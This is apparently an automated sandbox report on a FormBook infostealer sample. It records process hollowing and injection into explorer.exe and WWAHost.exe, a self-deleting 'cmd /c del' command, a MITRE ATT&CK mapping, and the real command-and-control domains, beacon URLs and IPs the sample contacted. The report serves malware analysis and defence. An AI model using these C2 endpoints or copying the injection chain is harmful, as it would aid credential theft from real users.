Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]	6_2_03211C06

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 52.116.52.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.180.50.162 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.26.55 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.0.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.147.112 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.181.218.55 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 219.94.203.152 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 67.205.105.239 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.244 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.18.45.60 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Memory written: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 380000

Jump to behavior

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000002.1028905228.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000002.00000000.679763405.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000006.00000002.1031199157.0000000005950000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.679763405.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000006.00000002.1031199157.0000000005950000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.679763405.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000006.00000002.1031199157.0000000005950000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.679763405.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000006.00000002.1031199157.0000000005950000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.696503730.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing12	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
JdtN8nIcLi8RQOi.exe	22%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
JdtN8nIcLi8RQOi.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
www.eldritchparadox.com	0%	Virustotal	Browse
www.straightlineautoserviceerie.net	0%	Virustotal	Browse
www.bimetalthermostatksd.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.cmoorestudio.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd	0%	Avira URL Cloud	safe
http://www.promanconsortium.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe	0%	Avira URL Cloud	safe
http://www.maconanimalexterminator.com/ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG	0%	Avira URL Cloud	safe
http://www.restaurantsilhouette.com/ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.pelisplusxd.net/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8	0%	Avira URL Cloud	safe
http://www.nolarapper.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.bimetalthermostatksd.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.animaliaartist.com/ur06/?jL30vv=DfgF7yDRSUzi2OKDRXwTsSYzBeik9khHCLZes6TEJ2ymfZv/W121O8qOC	0%	Avira URL Cloud	safe
http://www.central-car-sales.com/ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG	0%	Avira URL Cloud	safe
http://www.allismd.com/ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.eldritchparadox.com/ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG	0%	Avira URL Cloud	safe
http://www.profille-sarina23tammara.club/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf	0%	Avira URL Cloud	safe
http://www.searchvity.com/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.eldritchparadox.com	66.96.147.112	true	true	0%, Virustotal, Browse	unknown
www.straightlineautoserviceerie.net	104.18.45.60	true	true	0%, Virustotal, Browse	unknown
nolarapper.com	34.102.136.180	true	true		unknown
www.central-car-sales.com	219.94.203.152	true	true		unknown
www.bimetalthermostatksd.com	52.116.52.25	true	true	0%, Virustotal, Browse	unknown
www.profille-sarina23tammara.club	198.54.117.244	true	true		unknown
restaurantsilhouette.com	34.102.136.180	true	true		unknown
allismd.com	5.181.218.55	true	true		unknown
maconanimalexterminator.com	107.180.50.162	true	true		unknown
cmoorestudio.com	34.102.136.180	true	true		unknown
www.pelisplusxd.net	104.21.26.55	true	true		unknown
animaliaartist.com	67.205.105.239	true	true		unknown
www.promanconsortium.com	192.185.0.218	true	true		unknown
www.animaliaartist.com	unknown	unknown	true		unknown
www.nolarapper.com	unknown	unknown	true		unknown
www.allismd.com	unknown	unknown	true		unknown
www.qoo10online.com	unknown	unknown	true		unknown
g.msn.com	unknown	unknown	false		high
www.nipseythegreat.com	unknown	unknown	true		unknown
www.restaurantsilhouette.com	unknown	unknown	true		unknown
www.maconanimalexterminator.com	unknown	unknown	true		unknown
www.cmoorestudio.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.cmoorestudio.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd	true	Avira URL Cloud: safe	unknown
http://www.promanconsortium.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe	true	Avira URL Cloud: safe	unknown
http://www.maconanimalexterminator.com/ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG	true	Avira URL Cloud: safe	unknown
http://www.restaurantsilhouette.com/ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG	true	Avira URL Cloud: safe	unknown
http://www.pelisplusxd.net/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8	true	Avira URL Cloud: safe	unknown
http://www.nolarapper.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO	true	Avira URL Cloud: safe	unknown
http://www.bimetalthermostatksd.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2	true	Avira URL Cloud: safe	unknown
http://www.central-car-sales.com/ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG	true	Avira URL Cloud: safe	unknown
http://www.allismd.com/ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG	true	Avira URL Cloud: safe	unknown
http://www.eldritchparadox.com/ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG	true	Avira URL Cloud: safe	unknown
http://www.profille-sarina23tammara.club/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.animaliaartist.com/ur06/?jL30vv=DfgF7yDRSUzi2OKDRXwTsSYzBeik9khHCLZes6TEJ2ymfZv/W121O8qOC	WWAHost.exe, 00000006.00000002.1029486637.000000000250A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.searchvity.com/	WWAHost.exe, 00000006.00000002.1030966590.00000000037E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000002.00000002.1030409117.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.116.52.25	unknown	United States	36351	SOFTLAYERUS	true
107.180.50.162	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
104.21.26.55	unknown	United States	13335	CLOUDFLARENETUS	true
192.185.0.218	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
66.96.147.112	unknown	United States	29873	BIZLAND-SDUS	true
5.181.218.55	unknown	Germany	59637	ASRSINETRU	true
219.94.203.152	unknown	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
67.205.105.239	unknown	Canada	32613	IWEB-ASCA	true
198.54.117.244	unknown	United States	22612	NAMECHEAP-NETUS	true
104.18.45.60	unknown	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339360
Start date:	13.01.2021
Start time:	21:38:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	JdtN8nIcLi8RQOi.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@18/12
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.4% (good quality ratio 16.3%) Quality average: 73.1% Quality standard deviation: 32.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 176 Number of non-executed functions: 160
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.42.151.234, 51.104.139.180, 92.122.213.194, 92.122.213.247, 93.184.221.240, 52.155.217.156, 20.54.26.129, 52.142.114.176, 51.11.168.160 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, g-msn-com-europe-vip.trafficmanager.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:39:16	API Interceptor	2x Sleep call for process: JdtN8nIcLi8RQOi.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
107.180.50.162	P.O-45.exe	Get hash	malicious	Browse	www.kernwide.com/s9zh/?3f=YnOlnZfXtJb&RHR=Ae3+14NK9ZuVfLisH9eKoB22k1V/zcRjzccjQxj5qujlIFw60ODYsyy8qRaOpCDy8Yjl
